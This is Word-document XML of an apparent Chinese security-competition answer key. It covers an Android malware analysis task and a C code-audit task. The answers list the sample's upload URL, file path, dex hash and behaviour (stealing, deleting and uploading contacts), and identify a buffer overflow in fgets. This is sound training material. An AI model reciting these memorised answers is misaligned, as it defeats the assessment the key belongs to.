            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="588"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838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evidence 1</w:t>
            </w:r>
            <w:r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600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yiji.doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5393" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRDefault="00D900AF" w:rsidP="00D900AF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D900AF"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  <w:t>F70BBEC2D9AC8A4658D262D2695824EA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="293" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="590" w:hanging="605"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc131456819"/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lastRenderedPageBreak/>
        <w:t>第三部分</w:t>
      </w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应用程序安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/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16" w:name="_Toc131456820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任务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5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bookmarkEnd w:id="16"/>
      <w:r w:rsidR="002A242E" w:rsidRPr="002A242E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Android</w:t>
      </w:r>
      <w:r w:rsidR="002A242E" w:rsidRPr="002A242E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恶意程序分析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（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50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分）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="002A242E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 w:rsidRPr="002A242E"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A集团发现其发布的Android移动应用程序文件遭到非法篡改，您的团队需要协助A集团对该恶意程序样本进行逆向分析、对</w:t>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="002A242E"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其攻击/破坏的行为进行调查取证。</w:t>
      </w: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18" w:name="_Toc131456821"/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本任务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素材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清单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Android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移动应用程序文件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。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/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请按要求完成该部分的工作任务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="816"/>
        <w:gridCol w:w="4885"/>
        <w:gridCol w:w="4130"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8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Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑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任务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：</w:t>
            </w:r>
            <w:r w:rsidR="002A242E" w:rsidRPr="002A242E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Android</w:t>
            </w:r>
            <w:r w:rsidR="002A242E" w:rsidRPr="002A242E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>恶意程序分析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 w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4885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 w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>任务内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130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答案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A242E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2A242E" w:rsidRDefault="002A242E" w:rsidP="002A242E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885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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提交素材中的恶意应用回传数据的url地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130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/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t>http://wwww.somethingOrNothing.com/r/r/r/r</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A242E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2A242E" w:rsidRDefault="002A242E" w:rsidP="002A242E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885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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提交素材中的恶意代码保存数据文件名称（含路径）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130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/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t>/storage/emulated/0/Android/data/com.example.myapplication/files/.a/.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A242E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2A242E" w:rsidRDefault="002A242E" w:rsidP="002A242E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885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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提交素材中的恶意行为发起的dex的S</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t>HA1</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130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/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t>bb5adc13d8cedb7b34187d8293a92a5ee02996b0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A242E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2A242E" w:rsidRDefault="002A242E" w:rsidP="002A242E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885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/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>描述素材中恶意代码的行为</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002A242E" w:rsidRPr="00ED120F" w:rsidRDefault="002A242E" w:rsidP="002A242E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>读取并删除通讯录联系人数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>写入本地文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED120F">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并上传到指定网址。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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19" w:name="_Toc131456822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任务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6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C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代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/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（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30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分）</w:t>
      </w:r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 w:rsidRPr="00B463FA"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代码审计是指对源代码进行检查，寻找代码存在的脆弱性，这是一项需要多方面技能的技术。作为一项软件安全检查工作，代码安全审查是非常重要的一部分，因为大部分代码从语法和语义上来说是正确的，但存在着可能被利用的安全漏洞，你必须依赖你的知识和经验来完成这项工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="50" w:before="120" w:afterLines="50" w:after="120"/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</w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc131456823"/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本任务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素材</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>清单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：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C</w:t>
      </w:r>
      <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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源代码文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="560"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请按要求完成该部分的工作任务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="816"/>
        <w:gridCol w:w="4885"/>
        <w:gridCol w:w="4130"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="004E4455">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑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任务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6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：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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>代码审计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885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任务内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130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答案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885" w:type="dxa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FA4B4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请指出本段代码存在什么漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130" w:type="dxa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746A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>缓冲区溢出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="510"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00AD2BA7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center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885" w:type="dxa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仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA4B44">
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>请指出存在漏洞的函数名称，例如：scanf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4130" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00AD2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F746A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>fgets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00561704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00561704" w:rsidRDefault="00561704" w:rsidP="00561704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00561704" w:rsidSect="00561704">
      <w:headerReference w:type="even" r:id="rId8"/>
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:headerReference w:type="first" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="9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04B" w:rsidRDefault="0031504B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0031504B" w:rsidRDefault="003150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Mono">
    <w:altName w:val="MS Gothic"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000001" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000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rutiger LT Com 55 Roman">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B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utiger LT Com 45 Light">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B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charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000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04B" w:rsidRDefault="0031504B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0031504B" w:rsidRDefault="003150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BA7" w:rsidRDefault="00AD2B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BA7" w:rsidRDefault="00AD2BA7">
    <w:pPr>
      <w:pStyle w:val="a4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13004165</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-69215</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="725170" cy="615315"/>
          <wp:effectExtent l="0" t="0" r="11430" b="19685"/>
          <wp:wrapNone/>
          <wp:docPr id="19" name="图片 19" descr="/Users/kim/Desktop/内容/项目/logo.pn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9" descr="/Users/kim/Desktop/内容/项目/logo.png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17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BA7" w:rsidRDefault="00AD2B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10A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C4D10A7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1260" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2.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24BC6A12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24BC6A12"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15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3E79561A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E79561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D220A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D220A9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4857084B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4857084B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D994B1F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5D994B1F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono" w:cs="Andale Mono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kZWI2N2Y1OWNlMThhNjExYWI5YzliODYzNGQyZTYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00F82DD9"/>
    <w:rsid w:val="00010851"/>
    <w:rsid w:val="000401F6"/>
    <w:rsid w:val="000462ED"/>
    <w:rsid w:val="000C0EBD"/>
    <w:rsid w:val="000C2B26"/>
    <w:rsid w:val="0012548B"/>
    <w:rsid w:val="001554F8"/>
    <w:rsid w:val="0016739F"/>
    <w:rsid w:val="00192652"/>
    <w:rsid w:val="001B35CC"/>
    <w:rsid w:val="001B5FA0"/>
    <w:rsid w:val="001E14DD"/>
    <w:rsid w:val="001F4FFD"/>
    <w:rsid w:val="00201E71"/>
    <w:rsid w:val="00216779"/>
    <w:rsid w:val="00233E19"/>
    <w:rsid w:val="00286199"/>
    <w:rsid w:val="002A22B3"/>
    <w:rsid w:val="002A242E"/>
    <w:rsid w:val="002B1976"/>
    <w:rsid w:val="002B63BD"/>
    <w:rsid w:val="002D012D"/>
    <w:rsid w:val="002F6196"/>
    <w:rsid w:val="0031504B"/>
    <w:rsid w:val="00390463"/>
    <w:rsid w:val="003E5CEE"/>
    <w:rsid w:val="003F6905"/>
    <w:rsid w:val="00470260"/>
    <w:rsid w:val="004C4750"/>
    <w:rsid w:val="004E0754"/>
    <w:rsid w:val="004E4455"/>
    <w:rsid w:val="0051555E"/>
    <w:rsid w:val="0055651E"/>
    <w:rsid w:val="00561704"/>
    <w:rsid w:val="005673DD"/>
    <w:rsid w:val="00593856"/>
    <w:rsid w:val="005F2A8C"/>
    <w:rsid w:val="00600E7E"/>
    <w:rsid w:val="00603158"/>
    <w:rsid w:val="006133CE"/>
    <w:rsid w:val="00680479"/>
    <w:rsid w:val="006831CA"/>
    <w:rsid w:val="006934B5"/>
    <w:rsid w:val="00694971"/>
    <w:rsid w:val="006E3DD6"/>
    <w:rsid w:val="00733050"/>
    <w:rsid w:val="007727F7"/>
    <w:rsid w:val="00795CC6"/>
    <w:rsid w:val="007B30E6"/>
    <w:rsid w:val="007D60BF"/>
    <w:rsid w:val="007E72B2"/>
    <w:rsid w:val="00803A70"/>
    <w:rsid w:val="0089189C"/>
    <w:rsid w:val="008957C0"/>
    <w:rsid w:val="008A4246"/>
    <w:rsid w:val="008B27AE"/>
    <w:rsid w:val="008B36F9"/>
    <w:rsid w:val="009342B7"/>
    <w:rsid w:val="00A02248"/>
    <w:rsid w:val="00A10AC6"/>
    <w:rsid w:val="00A14873"/>
    <w:rsid w:val="00A35DF5"/>
    <w:rsid w:val="00A53275"/>
    <w:rsid w:val="00A747BD"/>
    <w:rsid w:val="00AA6252"/>
    <w:rsid w:val="00AC4EF1"/>
    <w:rsid w:val="00AD2BA7"/>
    <w:rsid w:val="00B264AD"/>
    <w:rsid w:val="00B464C7"/>
    <w:rsid w:val="00B6039D"/>
    <w:rsid w:val="00B6126E"/>
    <w:rsid w:val="00BA1E9C"/>
    <w:rsid w:val="00BD15E3"/>
    <w:rsid w:val="00BE24EA"/>
    <w:rsid w:val="00BF4EAC"/>
    <w:rsid w:val="00C06F4B"/>
    <w:rsid w:val="00C17430"/>
    <w:rsid w:val="00C3472A"/>
    <w:rsid w:val="00CC1020"/>
    <w:rsid w:val="00CE67B7"/>
    <w:rsid w:val="00CE7AFD"/>
    <w:rsid w:val="00D2669E"/>
    <w:rsid w:val="00D63998"/>
    <w:rsid w:val="00D900AF"/>
    <w:rsid w:val="00DC3167"/>
    <w:rsid w:val="00DC5C15"/>
    <w:rsid w:val="00DD3F86"/>
    <w:rsid w:val="00DE3CB0"/>
    <w:rsid w:val="00E24552"/>
    <w:rsid w:val="00E933B8"/>
    <w:rsid w:val="00EB07AE"/>
    <w:rsid w:val="00EC0203"/>
    <w:rsid w:val="00EC35B9"/>
